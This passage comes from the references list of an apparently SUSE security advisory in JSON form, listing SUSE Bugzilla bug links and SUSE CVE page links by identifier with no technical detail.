"summary": "SUSE Bug 1249998",
"url": "https://bugzilla.suse.com/1249998"
},
{
"category": "self",
"summary": "SUSE Bug 1250032",
"url": "https://bugzilla.suse.com/1250032"
},
{
"category": "self",
"summary": "SUSE Bug 1250082",
"url": "https://bugzilla.suse.com/1250082"
},
{
"category": "self",
"summary": "SUSE Bug 1250388",
"url": "https://bugzilla.suse.com/1250388"
},
{
"category": "self",
"summary": "SUSE Bug 1250705",
"url": "https://bugzilla.suse.com/1250705"
},
{
"category": "self",
"summary": "SUSE Bug 1250738",
"url": "https://bugzilla.suse.com/1250738"
},
{
"category": "self",
"summary": "SUSE Bug 1250748",
"url": "https://bugzilla.suse.com/1250748"
},
{
"category": "self",
"summary": "SUSE Bug 1252712",
"url": "https://bugzilla.suse.com/1252712"
},
{
"category": "self",
"summary": "SUSE Bug 1252773",
"url": "https://bugzilla.suse.com/1252773"
},
{
"category": "self",
"summary": "SUSE Bug 1252784",
"url": "https://bugzilla.suse.com/1252784"
},
{
"category": "self",
"summary": "SUSE Bug 1252891",
"url": "https://bugzilla.suse.com/1252891"
},
{
"category": "self",
"summary": "SUSE Bug 1252900",
"url": "https://bugzilla.suse.com/1252900"
},
{
"category": "self",
"summary": "SUSE Bug 1253049",
"url": "https://bugzilla.suse.com/1253049"
},
{
"category": "self",
"summary": "SUSE Bug 1253078",
"url": "https://bugzilla.suse.com/1253078"
},
{
"category": "self",
"summary": "SUSE Bug 1253079",
"url": "https://bugzilla.suse.com/1253079"
},
{
"category": "self",
"summary": "SUSE Bug 1253087",
"url": "https://bugzilla.suse.com/1253087"
},
{
"category": "self",
"summary": "SUSE Bug 1253344",
"url": "https://bugzilla.suse.com/1253344"
},
{
"category": "self",
"summary": "SUSE Bug 1253500",
"url": "https://bugzilla.suse.com/1253500"
},
{
"category": "self",
"summary": "SUSE Bug 1253739",
"url": "https://bugzilla.suse.com/1253739"
},
{
"category": "self",
"summary": "SUSE Bug 1254244",
"url": "https://bugzilla.suse.com/1254244"
},
{
"category": "self",
"summary": "SUSE Bug 1254308",
"url": "https://bugzilla.suse.com/1254308"
},
{
"category": "self",
"summary": "SUSE Bug 1254447",
"url": "https://bugzilla.suse.com/1254447"
},
{
"category": "self",
"summary": "SUSE Bug 1254839",
"url": "https://bugzilla.suse.com/1254839"
},
{
"category": "self",
"summary": "SUSE Bug 1254842",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "self",
"summary": "SUSE Bug 1254845",
"url": "https://bugzilla.suse.com/1254845"
},
{
"category": "self",
"summary": "SUSE Bug 1254977",
"url": "https://bugzilla.suse.com/1254977"
},
{
"category": "self",
"summary": "SUSE Bug 1255102",
"url": "https://bugzilla.suse.com/1255102"
},
{
"category": "self",
"summary": "SUSE Bug 1255128",
"url": "https://bugzilla.suse.com/1255128"
},
{
"category": "self",
"summary": "SUSE Bug 1255157",
"url": "https://bugzilla.suse.com/1255157"
},
{
"category": "self",
"summary": "SUSE Bug 1255164",
"url": "https://bugzilla.suse.com/1255164"
},
{
"category": "self",
"summary": "SUSE Bug 1255172",
"url": "https://bugzilla.suse.com/1255172"
},
{
"category": "self",
"summary": "SUSE Bug 1255216",
"url": "https://bugzilla.suse.com/1255216"
},
{
"category": "self",
"summary": "SUSE Bug 1255232",
"url": "https://bugzilla.suse.com/1255232"
},
{
"category": "self",
"summary": "SUSE Bug 1255241",
"url": "https://bugzilla.suse.com/1255241"
},
{
"category": "self",
"summary": "SUSE Bug 1255245",
"url": "https://bugzilla.suse.com/1255245"
},
{
"category": "self",
"summary": "SUSE Bug 1255266",
"url": "https://bugzilla.suse.com/1255266"
},
{
"category": "self",
"summary": "SUSE Bug 1255268",
"url": "https://bugzilla.suse.com/1255268"
},
{
"category": "self",
"summary": "SUSE Bug 1255269",
"url": "https://bugzilla.suse.com/1255269"
},
{
"category": "self",
"summary": "SUSE Bug 1255319",
"url": "https://bugzilla.suse.com/1255319"
},
{
"category": "self",
"summary": "SUSE Bug 1255327",
"url": "https://bugzilla.suse.com/1255327"
},
{
"category": "self",
"summary": "SUSE Bug 1255346",
"url": "https://bugzilla.suse.com/1255346"
},
{
"category": "self",
"summary": "SUSE Bug 1255403",
"url": "https://bugzilla.suse.com/1255403"
},
{
"category": "self",
"summary": "SUSE Bug 1255417",
"url": "https://bugzilla.suse.com/1255417"
},
{
"category": "self",
"summary": "SUSE Bug 1255459",
"url": "https://bugzilla.suse.com/1255459"
},
{
"category": "self",
"summary": "SUSE Bug 1255482",
"url": "https://bugzilla.suse.com/1255482"
},
{
"category": "self",
"summary": "SUSE Bug 1255506",
"url": "https://bugzilla.suse.com/1255506"
},
{
"category": "self",
"summary": "SUSE Bug 1255526",
"url": "https://bugzilla.suse.com/1255526"
},
{
"category": "self",
"summary": "SUSE Bug 1255527",
"url": "https://bugzilla.suse.com/1255527"
},
{
"category": "self",
"summary": "SUSE Bug 1255529",
"url": "https://bugzilla.suse.com/1255529"
},
{
"category": "self",
"summary": "SUSE Bug 1255530",
"url": "https://bugzilla.suse.com/1255530"
},
{
"category": "self",
"summary": "SUSE Bug 1255536",
"url": "https://bugzilla.suse.com/1255536"
},
{
"category": "self",
"summary": "SUSE Bug 1255537",
"url": "https://bugzilla.suse.com/1255537"
},
{
"category": "self",
"summary": "SUSE Bug 1255542",
"url": "https://bugzilla.suse.com/1255542"
},
{
"category": "self",
"summary": "SUSE Bug 1255544",
"url": "https://bugzilla.suse.com/1255544"
},
{
"category": "self",
"summary": "SUSE Bug 1255547",
"url": "https://bugzilla.suse.com/1255547"
},
{
"category": "self",
"summary": "SUSE Bug 1255569",
"url": "https://bugzilla.suse.com/1255569"
},
{
"category": "self",
"summary": "SUSE Bug 1255593",
"url": "https://bugzilla.suse.com/1255593"
},
{
"category": "self",
"summary": "SUSE Bug 1255622",
"url": "https://bugzilla.suse.com/1255622"
},
{
"category": "self",
"summary": "SUSE Bug 1255694",
"url": "https://bugzilla.suse.com/1255694"
},
{
"category": "self",
"summary": "SUSE Bug 1255695",
"url": "https://bugzilla.suse.com/1255695"
},
{
"category": "self",
"summary": "SUSE Bug 1255703",
"url": "https://bugzilla.suse.com/1255703"
},
{
"category": "self",
"summary": "SUSE Bug 1255708",
"url": "https://bugzilla.suse.com/1255708"
},
{
"category": "self",
"summary": "SUSE Bug 1255811",
"url": "https://bugzilla.suse.com/1255811"
},
{
"category": "self",
"summary": "SUSE Bug 1255930",
"url": "https://bugzilla.suse.com/1255930"
},
{
"category": "self",
"summary": "SUSE Bug 1256579",
"url": "https://bugzilla.suse.com/1256579"
},
{
"category": "self",
"summary": "SUSE Bug 1256582",
"url": "https://bugzilla.suse.com/1256582"
},
{
"category": "self",
"summary": "SUSE Bug 1256584",
"url": "https://bugzilla.suse.com/1256584"
},
{
"category": "self",
"summary": "SUSE Bug 1256586",
"url": "https://bugzilla.suse.com/1256586"
},
{
"category": "self",
"summary": "SUSE Bug 1256591",
"url": "https://bugzilla.suse.com/1256591"
},
{
"category": "self",
"summary": "SUSE Bug 1256592",
"url": "https://bugzilla.suse.com/1256592"
},
{
"category": "self",
"summary": "SUSE Bug 1256593",
"url": "https://bugzilla.suse.com/1256593"
},
{
"category": "self",
"summary": "SUSE Bug 1256594",
"url": "https://bugzilla.suse.com/1256594"
},
{
"category": "self",
"summary": "SUSE Bug 1256597",
"url": "https://bugzilla.suse.com/1256597"
},
{
"category": "self",
"summary": "SUSE Bug 1256605",
"url": "https://bugzilla.suse.com/1256605"
},
{
"category": "self",
"summary": "SUSE Bug 1256607",
"url": "https://bugzilla.suse.com/1256607"
},
{
"category": "self",
"summary": "SUSE Bug 1256608",
"url": "https://bugzilla.suse.com/1256608"
},
{
"category": "self",
"summary": "SUSE Bug 1256609",
"url": "https://bugzilla.suse.com/1256609"
},
{
"category": "self",
"summary": "SUSE Bug 1256610",
"url": "https://bugzilla.suse.com/1256610"
},
{
"category": "self",
"summary": "SUSE Bug 1256611",
"url": "https://bugzilla.suse.com/1256611"
},
{
"category": "self",
"summary": "SUSE Bug 1256612",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "self",
"summary": "SUSE Bug 1256613",
"url": "https://bugzilla.suse.com/1256613"
},
{
"category": "self",
"summary": "SUSE Bug 1256616",
"url": "https://bugzilla.suse.com/1256616"
},
{
"category": "self",
"summary": "SUSE Bug 1256617",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "self",
"summary": "SUSE Bug 1256619",
"url": "https://bugzilla.suse.com/1256619"
},
{
"category": "self",
"summary": "SUSE Bug 1256622",
"url": "https://bugzilla.suse.com/1256622"
},
{
"category": "self",
"summary": "SUSE Bug 1256623",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "self",
"summary": "SUSE Bug 1256625",
"url": "https://bugzilla.suse.com/1256625"
},
{
"category": "self",
"summary": "SUSE Bug 1256627",
"url": "https://bugzilla.suse.com/1256627"
},
{
"category": "self",
"summary": "SUSE Bug 1256628",
"url": "https://bugzilla.suse.com/1256628"
},
{
"category": "self",
"summary": "SUSE Bug 1256630",
"url": "https://bugzilla.suse.com/1256630"
},
{
"category": "self",
"summary": "SUSE Bug 1256632",
"url": "https://bugzilla.suse.com/1256632"
},
{
"category": "self",
"summary": "SUSE Bug 1256638",
"url": "https://bugzilla.suse.com/1256638"
},
{
"category": "self",
"summary": "SUSE Bug 1256641",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "self",
"summary": "SUSE Bug 1256643",
"url": "https://bugzilla.suse.com/1256643"
},
{
"category": "self",
"summary": "SUSE Bug 1256645",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "self",
"summary": "SUSE Bug 1256646",
"url": "https://bugzilla.suse.com/1256646"
},
{
"category": "self",
"summary": "SUSE Bug 1256650",
"url": "https://bugzilla.suse.com/1256650"
},
{
"category": "self",
"summary": "SUSE Bug 1256651",
"url": "https://bugzilla.suse.com/1256651"
},
{
"category": "self",
"summary": "SUSE Bug 1256653",
"url": "https://bugzilla.suse.com/1256653"
},
{
"category": "self",
"summary": "SUSE Bug 1256654",
"url": "https://bugzilla.suse.com/1256654"
},
{
"category": "self",
"summary": "SUSE Bug 1256655",
"url": "https://bugzilla.suse.com/1256655"
},
{
"category": "self",
"summary": "SUSE Bug 1256656",
"url": "https://bugzilla.suse.com/1256656"
},
{
"category": "self",
"summary": "SUSE Bug 1256659",
"url": "https://bugzilla.suse.com/1256659"
},
{
"category": "self",
"summary": "SUSE Bug 1256660",
"url": "https://bugzilla.suse.com/1256660"
},
{
"category": "self",
"summary": "SUSE Bug 1256661",
"url": "https://bugzilla.suse.com/1256661"
},
{
"category": "self",
"summary": "SUSE Bug 1256664",
"url": "https://bugzilla.suse.com/1256664"
},
{
"category": "self",
"summary": "SUSE Bug 1256665",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "self",
"summary": "SUSE Bug 1256667",
"url": "https://bugzilla.suse.com/1256667"
},
{
"category": "self",
"summary": "SUSE Bug 1256668",
"url": "https://bugzilla.suse.com/1256668"
},
{
"category": "self",
"summary": "SUSE Bug 1256674",
"url": "https://bugzilla.suse.com/1256674"
},
{
"category": "self",
"summary": "SUSE Bug 1256677",
"url": "https://bugzilla.suse.com/1256677"
},
{
"category": "self",
"summary": "SUSE Bug 1256680",
"url": "https://bugzilla.suse.com/1256680"
},
{
"category": "self",
"summary": "SUSE Bug 1256682",
"url": "https://bugzilla.suse.com/1256682"
},
{
"category": "self",
"summary": "SUSE Bug 1256683",
"url": "https://bugzilla.suse.com/1256683"
},
{
"category": "self",
"summary": "SUSE Bug 1256688",
"url": "https://bugzilla.suse.com/1256688"
},
{
"category": "self",
"summary": "SUSE Bug 1256689",
"url": "https://bugzilla.suse.com/1256689"
},
{
"category": "self",
"summary": "SUSE Bug 1256716",
"url": "https://bugzilla.suse.com/1256716"
},
{
"category": "self",
"summary": "SUSE Bug 1256726",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "self",
"summary": "SUSE Bug 1256728",
"url": "https://bugzilla.suse.com/1256728"
},
{
"category": "self",
"summary": "SUSE Bug 1256730",
"url": "https://bugzilla.suse.com/1256730"
},
{
"category": "self",
"summary": "SUSE Bug 1256733",
"url": "https://bugzilla.suse.com/1256733"
},
{
"category": "self",
"summary": "SUSE Bug 1256737",
"url": "https://bugzilla.suse.com/1256737"
},
{
"category": "self",
"summary": "SUSE Bug 1256741",
"url": "https://bugzilla.suse.com/1256741"
},
{
"category": "self",
"summary": "SUSE Bug 1256742",
"url": "https://bugzilla.suse.com/1256742"
},
{
"category": "self",
"summary": "SUSE Bug 1256744",
"url": "https://bugzilla.suse.com/1256744"
},
{
"category": "self",
"summary": "SUSE Bug 1256748",
"url": "https://bugzilla.suse.com/1256748"
},
{
"category": "self",
"summary": "SUSE Bug 1256749",
"url": "https://bugzilla.suse.com/1256749"
},
{
"category": "self",
"summary": "SUSE Bug 1256752",
"url": "https://bugzilla.suse.com/1256752"
},
{
"category": "self",
"summary": "SUSE Bug 1256754",
"url": "https://bugzilla.suse.com/1256754"
},
{
"category": "self",
"summary": "SUSE Bug 1256755",
"url": "https://bugzilla.suse.com/1256755"
},
{
"category": "self",
"summary": "SUSE Bug 1256756",
"url": "https://bugzilla.suse.com/1256756"
},
{
"category": "self",
"summary": "SUSE Bug 1256757",
"url": "https://bugzilla.suse.com/1256757"
},
{
"category": "self",
"summary": "SUSE Bug 1256759",
"url": "https://bugzilla.suse.com/1256759"
},
{
"category": "self",
"summary": "SUSE Bug 1256760",
"url": "https://bugzilla.suse.com/1256760"
},
{
"category": "self",
"summary": "SUSE Bug 1256761",
"url": "https://bugzilla.suse.com/1256761"
},
{
"category": "self",
"summary": "SUSE Bug 1256763",
"url": "https://bugzilla.suse.com/1256763"
},
{
"category": "self",
"summary": "SUSE Bug 1256770",
"url": "https://bugzilla.suse.com/1256770"
},
{
"category": "self",
"summary": "SUSE Bug 1256773",
"url": "https://bugzilla.suse.com/1256773"
},
{
"category": "self",
"summary": "SUSE Bug 1256774",
"url": "https://bugzilla.suse.com/1256774"
},
{
"category": "self",
"summary": "SUSE Bug 1256777",
"url": "https://bugzilla.suse.com/1256777"
},
{
"category": "self",
"summary": "SUSE Bug 1256779",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "self",
"summary": "SUSE Bug 1256781",
"url": "https://bugzilla.suse.com/1256781"
},
{
"category": "self",
"summary": "SUSE Bug 1256785",
"url": "https://bugzilla.suse.com/1256785"
},
{
"category": "self",
"summary": "SUSE Bug 1256792",
"url": "https://bugzilla.suse.com/1256792"
},
{
"category": "self",
"summary": "SUSE Bug 1256793",
"url": "https://bugzilla.suse.com/1256793"
},
{
"category": "self",
"summary": "SUSE Bug 1256794",
"url": "https://bugzilla.suse.com/1256794"
},
{
"category": "self",
"summary": "SUSE Bug 1256864",
"url": "https://bugzilla.suse.com/1256864"
},
{
"category": "self",
"summary": "SUSE Bug 1256865",
"url": "https://bugzilla.suse.com/1256865"
},
{
"category": "self",
"summary": "SUSE Bug 1256867",
"url": "https://bugzilla.suse.com/1256867"
},
{
"category": "self",
"summary": "SUSE Bug 1256975",
"url": "https://bugzilla.suse.com/1256975"
},
{
"category": "self",
"summary": "SUSE Bug 1257015",
"url": "https://bugzilla.suse.com/1257015"
},
{
"category": "self",
"summary": "SUSE Bug 1257035",
"url": "https://bugzilla.suse.com/1257035"
},
{
"category": "self",
"summary": "SUSE Bug 1257053",
"url": "https://bugzilla.suse.com/1257053"
},
{
"category": "self",
"summary": "SUSE Bug 1257154",
"url": "https://bugzilla.suse.com/1257154"
},
{
"category": "self",
"summary": "SUSE Bug 1257155",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "self",
"summary": "SUSE Bug 1257158",
"url": "https://bugzilla.suse.com/1257158"
},
{
"category": "self",
"summary": "SUSE Bug 1257159",
"url": "https://bugzilla.suse.com/1257159"
},
{
"category": "self",
"summary": "SUSE Bug 1257163",
"url": "https://bugzilla.suse.com/1257163"
},
{
"category": "self",
"summary": "SUSE Bug 1257164",
"url": "https://bugzilla.suse.com/1257164"
},
{
"category": "self",
"summary": "SUSE Bug 1257167",
"url": "https://bugzilla.suse.com/1257167"
},
{
"category": "self",
"summary": "SUSE Bug 1257168",
"url": "https://bugzilla.suse.com/1257168"
},
{
"category": "self",
"summary": "SUSE Bug 1257179",
"url": "https://bugzilla.suse.com/1257179"
},
{
"category": "self",
"summary": "SUSE Bug 1257180",
"url": "https://bugzilla.suse.com/1257180"
},
{
"category": "self",
"summary": "SUSE Bug 1257202",
"url": "https://bugzilla.suse.com/1257202"
},
{
"category": "self",
"summary": "SUSE Bug 1257204",
"url": "https://bugzilla.suse.com/1257204"
},
{
"category": "self",
"summary": "SUSE Bug 1257207",
"url": "https://bugzilla.suse.com/1257207"
},
{
"category": "self",
"summary": "SUSE Bug 1257208",
"url": "https://bugzilla.suse.com/1257208"
},
{
"category": "self",
"summary": "SUSE Bug 1257215",
"url": "https://bugzilla.suse.com/1257215"
},
{
"category": "self",
"summary": "SUSE Bug 1257217",
"url": "https://bugzilla.suse.com/1257217"
},
{
"category": "self",
"summary": "SUSE Bug 1257218",
"url": "https://bugzilla.suse.com/1257218"
},
{
"category": "self",
"summary": "SUSE Bug 1257220",
"url": "https://bugzilla.suse.com/1257220"
},
{
"category": "self",
"summary": "SUSE Bug 1257221",
"url": "https://bugzilla.suse.com/1257221"
},
{
"category": "self",
"summary": "SUSE Bug 1257225",
"url": "https://bugzilla.suse.com/1257225"
},
{
"category": "self",
"summary": "SUSE Bug 1257227",
"url": "https://bugzilla.suse.com/1257227"
},
{
"category": "self",
"summary": "SUSE Bug 1257232",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "self",
"summary": "SUSE Bug 1257234",
"url": "https://bugzilla.suse.com/1257234"
},
{
"category": "self",
"summary": "SUSE Bug 1257236",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "self",
"summary": "SUSE Bug 1257243",
"url": "https://bugzilla.suse.com/1257243"
},
{
"category": "self",
"summary": "SUSE Bug 1257245",
"url": "https://bugzilla.suse.com/1257245"
},
{
"category": "self",
"summary": "SUSE Bug 1257276",
"url": "https://bugzilla.suse.com/1257276"
},
{
"category": "self",
"summary": "SUSE Bug 1257277",
"url": "https://bugzilla.suse.com/1257277"
},
{
"category": "self",
"summary": "SUSE Bug 1257279",
"url": "https://bugzilla.suse.com/1257279"
},
{
"category": "self",
"summary": "SUSE Bug 1257282",
"url": "https://bugzilla.suse.com/1257282"
},
{
"category": "self",
"summary": "SUSE Bug 1257296",
"url": "https://bugzilla.suse.com/1257296"
},
{
"category": "self",
"summary": "SUSE Bug 1257309",
"url": "https://bugzilla.suse.com/1257309"
},
{
"category": "self",
"summary": "SUSE Bug 1257473",
"url": "https://bugzilla.suse.com/1257473"
},
{
"category": "self",
"summary": "SUSE Bug 1257504",
"url": "https://bugzilla.suse.com/1257504"
},
{
"category": "self",
"summary": "SUSE Bug 1257603",
"url": "https://bugzilla.suse.com/1257603"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-54031 page",
"url": "https://www.suse.com/security/cve/CVE-2024-54031/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37744 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37744/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37751 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37751/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37841 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37841/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37845 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37845/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37904 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37904/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37955 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37955/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38243 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38243/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38262 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38262/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38298 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38298/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38423 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38423/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38505 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38505/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38507 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38507/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38510 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38510/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38511 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38511/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38512 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38512/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38513 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38513/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38515 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38515/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38516 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38516/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38520 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38520/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38521 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38521/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38529 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38529/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38530 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38530/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38535 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38535/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38537 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38537/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38538 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38538/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38539 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38539/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38540 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38540/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38541 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38541/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38543 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38543/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38547 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38547/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38548 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38548/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38550 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38550/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38551 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38551/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38569 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38569/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38589 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38589/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38590 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38590/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38645 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38645/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39689 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39689/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39795 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39795/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39814 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39814/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39817 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39817/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39829 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39829/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39880 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39880/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39913 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39913/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39927 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39927/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40030 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40030/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40045 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40045/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40106 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40106/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40147 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40147/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40195 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40195/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40257 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40257/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40259 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40259/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40363 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40363/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68174 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68174/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68178 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68188 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68188/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68200 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68200/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68211 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68211/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68218 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68218/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68227 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68227/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68241 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68241/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68245 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68245/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68296 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68296/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68320 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68320/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68325 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68325/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68337 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68337/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68341 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68341/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68348 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68348/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68349 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68349/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68356 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68356/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68359 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68359/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68360 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68360/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68361 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68361/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68366 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68366/"
},
{
"category": "self",
